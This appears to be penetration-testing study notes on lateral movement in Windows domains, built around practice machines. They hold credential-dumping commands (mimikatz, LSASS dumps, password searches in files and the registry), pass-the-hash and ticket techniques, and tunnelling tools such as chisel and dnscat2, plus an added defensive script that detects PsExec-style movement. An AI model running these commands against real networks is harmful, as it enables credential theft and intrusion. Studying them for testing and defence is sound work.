09 - Lateral Movement

# Overview

Lateral movement is the phase where an attacker pivots from their initial foothold to other systems within the target environment. The goal is to expand access, locate sensitive data, and ultimately reach high-value targets such as domain controllers, file servers, or databases. Lateral movement techniques leverage captured credentials, hashes, tickets, and certificates to authenticate to remote systems through a variety of protocols (SMB, WinRM, RDP, WMI, SSH).

# Methodology

## Phase 1: Discovery (Where to Go)

```bash
# Network reconnaissance from compromised host
ipconfig /all                                          # Windows: identify network segments
route print                                            # Routing table
net view /domain                                       # List domain computers
arp -a                                                 # ARP table (neighbors)
netstat -ano | findstr ESTABLISHED                     # Active connections

# Domain enumeration
net group "Domain Computers" /domain                   # All domain-joined computers
nltest /dclist:<domain>                                # List domain controllers
crackmapexec smb <subnet>                              # Discover SMB hosts
```

## Phase 2: Credential Gathering

```bash
# Memory
mimikatz # sekurlsa::logonpasswords
lsassy <IP> -u <user> -p <pass>                        # Remote LSASS dump
procdump -ma lsass.exe lsass.dmp                       # Dump LSASS

# Files
findstr /si password *.txt *.ini *.config *.xml        # Windows
grep -rni "password\|secret\|key" /var/www/ 2>/dev/null # Linux

# Registry
reg query HKLM /f password /t REG_SZ /s                # Credentials in registry

# Tickets
mimikatz # sekurlsa::tickets /export
Rubeus.exe dump
```

## Phase 3: Movement Method Selection

| Credential Type | Best Method |
|---|---|
| Plaintext password | WinRM, RDP, SSH, PsExec, WMIExec |
| NTLM hash | PTH (PsExec, WMIExec, WinRM, SMBExec, Atexec) |
| Kerberos ticket | PTT (PsExec, WMIExec with ticket) |
| PFX certificate | PTC (WinRM, RDP with cert) |
| SSH private key | SSH lateral movement |
| AES256/RC4 key | Overpass-the-Hash -> TGT -> PTT |

## Phase 4: Execution Decision Tree

```text
Have credentials ->
  Port 5985/5986 open -> evil-winrm (interactive PowerShell)
  Port 445 only -> impacket-psexec (service-based, ADMIN$ required)
                 -> impacket-wmiexec (WMI-based, quieter)
                 -> impacket-smbexec (named pipes, semi-interactive)
                 -> impacket-atexec (scheduled task)
  Port 3389 -> xfreerdp /pth (Restricted Admin mode)
  Port 22 -> SSH with key or password
  All blocked -> WMI via DCOM, PowerShell Remoting (5985/5986)

Have NTLM hash ->
  Local admin on target -> PTH via any SMB-based impacket tool
  WinRM enabled -> evil-winrm -H
  RDP Restricted Admin enabled -> xfreerdp /pth

Have Kerberos ticket ->
  Export from compromised host -> PTT -> netexec/impacket with -k flag
  Overpass-the-Hash -> request TGT -> PTT

Have certificate ->
  PTC via certipy auth -> extract NT hash -> PTH
```
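From the defender's side, as an added example that is not part of these notes: a small Python correlation over constructed Windows event records that flags the service-based SMB pattern the decision tree describes (network logon, ADMIN$ access, then a new service installed on the target within a short window). Event IDs 4624 (logon), 5145 (detailed share access) and 7045 (service installed) are the standard Windows Security/System IDs; the hostnames, addresses, user names and the service name in the sample records are constructed, and the check does not depend on the service name.

```python
# Correlate constructed Windows event records into alerts for the
# PsExec-style pattern: 4624 (logon type 3) + 5145 on ADMIN$ from the same
# remote source, followed by 7045 on that host within the window.
# All records below are constructed sample data, not real logs.
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [
    {"id": 4624, "ts": "2024-01-10T09:00:01", "host": "FS01", "src": "10.10.14.5",
     "logon_type": 3, "auth": "NTLM", "user": "svc_backup"},
    {"id": 5145, "ts": "2024-01-10T09:00:02", "host": "FS01", "src": "10.10.14.5",
     "share": "\\\\*\\ADMIN$", "user": "svc_backup"},
    {"id": 7045, "ts": "2024-01-10T09:00:03", "host": "FS01",
     "service": "PSEXESVC", "path": "%SystemRoot%\\PSEXESVC.exe"},
    # Benign activity: Kerberos logon and access to an ordinary share, no service.
    {"id": 4624, "ts": "2024-01-10T09:05:00", "host": "FS01", "src": "10.10.20.7",
     "logon_type": 3, "auth": "Kerberos", "user": "alice"},
    {"id": 5145, "ts": "2024-01-10T09:05:01", "host": "FS01", "src": "10.10.20.7",
     "share": "\\\\*\\Shared", "user": "alice"},
]

def parse_ts(s):
    return datetime.fromisoformat(s)

def detect_service_lateral_movement(events, window_seconds=60):
    """Return one alert per 7045 event that was preceded, within the window, by a
    network logon and ADMIN$ access from the same remote source on that host."""
    window = timedelta(seconds=window_seconds)
    logons = defaultdict(list)       # (host, src) -> [(ts, user, auth)]
    admin_share = defaultdict(list)  # (host, src) -> [ts]
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3:
            logons[(e["host"], e["src"])].append((parse_ts(e["ts"]), e["user"], e["auth"]))
        elif e["id"] == 5145 and e.get("share", "").upper().endswith("ADMIN$"):
            admin_share[(e["host"], e["src"])].append(parse_ts(e["ts"]))
    alerts = []
    for e in events:
        if e["id"] != 7045:
            continue
        t = parse_ts(e["ts"])
        for (host, src), share_times in admin_share.items():
            if host != e["host"] or not any(t - window <= s <= t for s in share_times):
                continue
            for lt, user, auth in logons.get((host, src), []):
                if t - window <= lt <= t:
                    alerts.append({"host": host, "src": src, "user": user,
                                   "auth": auth, "service": e["service"]})
                    break
    return alerts

if __name__ == "__main__":
    for alert in detect_service_lateral_movement(EVENTS):
        print(alert)
```

Tuning the window and adding the service binary path (7045 carries it) are the usual next steps; a path under a user-writable directory is worth a higher severity than one under %SystemRoot%.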

# Key Considerations

  • Double-hop problem: Credentials do not flow beyond the initial target. Use CredSSP, explicit credentials, or ticket-based auth.
  • SMB signing: If required, NTLM relay is blocked but PTH still works.
  • Firewall rules: WinRM (5985), RDP (3389), and SMB (445) may be blocked between network segments.
  • Time synchronization: Kerberos requires the attacker clock to be within 5 minutes of the DC: `sudo ntpdate -u <DC_IP>`.

# Cross-References

## Tool References

| Tool | Link |
|---|---|
| netexec | https://github.com/Porchetta-Industries/CrackMapExec |
| impacket | https://github.com/fortra/impacket |
| evil-winrm | https://github.com/Hackplayers/evil-winrm |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| Rubeus | https://github.com/GhostPack/Rubeus |
| certipy-ad | https://github.com/ly4k/Certipy |

## Source Machines

  • Cascade (Medium, AD) - Lateral movement via Audit share access and service accounts
  • Escape (Medium, AD) - MSSQL linked server lateral movement, PTH to Administrator
  • Flight (Hard, AD) - SMB share write -> hash theft -> lateral movement through multiple user contexts
  • Fluffy (Easy, AD) - ACL-based lateral movement through service accounts
  • Blackfield (Hard, AD) - ForceChangePassword for lateral movement to audit2020
  • Return (Easy, AD) - Server Operators group abuse for service manipulation

# Pivoting and Tunneling

## Quick Reference

| Tool | Type | Command |
|---|---|---|
| Ligolo-ng | SOCKS/Tunnel | `docker run -it --rm -p 11601:11601 nicocha30/ligolo-ng-proxy` |
| Chisel | SOCKS Proxy | `./chisel server -p 6666 --reverse --auth user:pass --tls` |
| SSH -D | Dynamic SOCKS | `ssh -D 1080 user@pivot` |
| SSH -L | Local Forward | `ssh -L 8080:127.0.0.1:80 user@pivot` |
| SSH -R | Remote Forward | `ssh -R 8080:127.0.0.1:80 user@pivot` |
| proxychains4 | SOCKS Client | `proxychains4 -q nxc smb target` |
| socat | TCP Relay | `socat TCP-LISTEN:8080,fork TCP:10.10.10.10:80` |
| netsh | Windows PortProxy | `netsh interface portproxy add v4tov4 ...` |
| dnscat2 | DNS Tunnel | `ruby dnscat2.rb domain.com` |
| httptunnel | HTTP Tunnel | `hts -F 8888 10.10.10.10:80` |